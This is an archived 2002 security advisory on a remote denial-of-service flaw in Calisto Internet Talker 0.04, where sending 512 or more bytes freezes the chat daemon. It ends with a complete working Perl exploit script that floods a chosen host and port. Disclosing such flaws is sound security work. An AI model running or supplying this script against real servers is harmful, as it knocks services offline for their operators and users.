SFAD02-002: Calisto Internet Talker Remote DOS

2002-11-26T00:00:00
ID SECURITYVULNS:DOC:3803
Type securityvulns
Reporter Securityvulns
Modified 2002-11-26T00:00:00

Description

[=================================================================]

[=================================================================]

Title : Calisto Internet Talker Remote DOS Risk : Moderate Software : Calisto Internet Talker Version 0.04 and prior Platforms : Linux/Solaris/Cygwin Vendor URL : http://www.arcsite.de/hp/flibble/calisto/ Discovered by : subversive <subversive@linuxmail.org> Advisory ID : SFAD02-002

.....:[ Overview :

Calisto is an Internet Talker that allows many people to use telnet to connect to the server and chat. Calisto is coded in C and runs on Linux/Solaris/Cygwin platforms. It is available on sourceforge as well as http://www.arcsite.de/hp/flibble/calisto/.

.....:[ Details :

By sending 512 bytes or more to the Calisto daemon it is possible to freeze it, resulting in a denial of service. Calisto comes with an autorun shell script that has been written for the sole purpose of automatically restarting Calisto should it crash but unfortunately this vulnerability will not cause Calisto to crash and segfault but rather freeze until manually restarted.

.....:[ Vendor Status :

Vendor contacted 1st/5th/10th November 2002 but did not respond.

.....:[ Solution :

Due to the nature of this bug it posses as more of an annoyance than a major security threat. If your concerned with the problem then simply disable Calisto until an updated version or patch has been released. Hopefully Calisto's vendors will take notice of this advisory and do something about the problem.

.....:[ Exploit - SF-talkischeap.pl :

!/usr/bin/perl

S e c u r i t y F r e a k s

www.securityfreaks.com

Calisto Internet Talker Version 0.04 Remote Denial of Service

This exploit will not cause Calisto to crash but rather cause it

to freeze until manually restarted. This actually works out better

because Calisto comes with an autorun script that would restart it

should it crash anyway.

[ subversive[at]linuxmail.org ] - 31/10/2002

use IO::Socket;

$data = "A"; $size = "512"; $freeze .= $data x $size;

while($_ = $ARGV[0], /^-/) { shift;
last if /^--$/; /^-h/ && do { $host = shift; }; /^-p/ && do { $port = shift; }; }

if(!$host != 0) {

print <<"ACTIONSSPEAKLOUDERTHANWORDS";

S e c u r i t y F r e a k s www.securityfreaks.com

SF-talkischeap.pl by subversive Calisto Internet Talker Version 0.04 Remote Denial of Service

Usage : $0 -h <host> -p <port>

ACTIONSSPEAKLOUDERTHANWORDS exit;

}

my $sock = new IO::Socket::INET ( Proto => "tcp", PeerAddr => $host, PeerPort => $port, ); die "\nCould not connect to $host : $!\n" unless $sock;

print $sock "$freeze"; close($sock); exit;

--


http://www.linuxmail.org/ Now with POP3/IMAP access for only US$19.95/yr

Powered by Outblaze